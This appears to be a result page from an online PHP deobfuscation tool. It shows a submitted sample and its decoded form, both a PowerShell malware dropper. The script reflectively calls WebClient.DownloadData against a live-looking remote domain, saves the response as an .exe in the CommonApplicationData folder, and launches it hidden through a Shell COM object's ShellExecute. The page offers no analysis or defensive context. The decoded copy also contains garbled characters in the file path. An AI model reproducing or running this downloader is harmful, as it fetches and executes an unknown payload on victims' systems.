Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$instance = [System.Activator]::CreateInstance("System.Net.WebClient"); $method = [Syst..
Decoded Output download
<? $instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq "DownloadData"){
try{
$uri = New-Object System.Uri("http://liumelvin89oayy.email/hssuwpqksm/o.php?l=mxap1.bz2")
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\ufffd\ufffdqifmRMBz.exe";
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;
?>
Did this file decode correctly?
Original Code
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq "DownloadData"){
try{
$uri = New-Object System.Uri("http://liumelvin89oayy.email/hssuwpqksm/o.php?l=mxap1.bz2")
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\qifmRMBz.exe";
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;
Function Calls
None |
Stats
MD5 | 3c3ecc1a73663ce695522c2666016fb5 |
Eval Count | 0 |
Decode Time | 105 ms |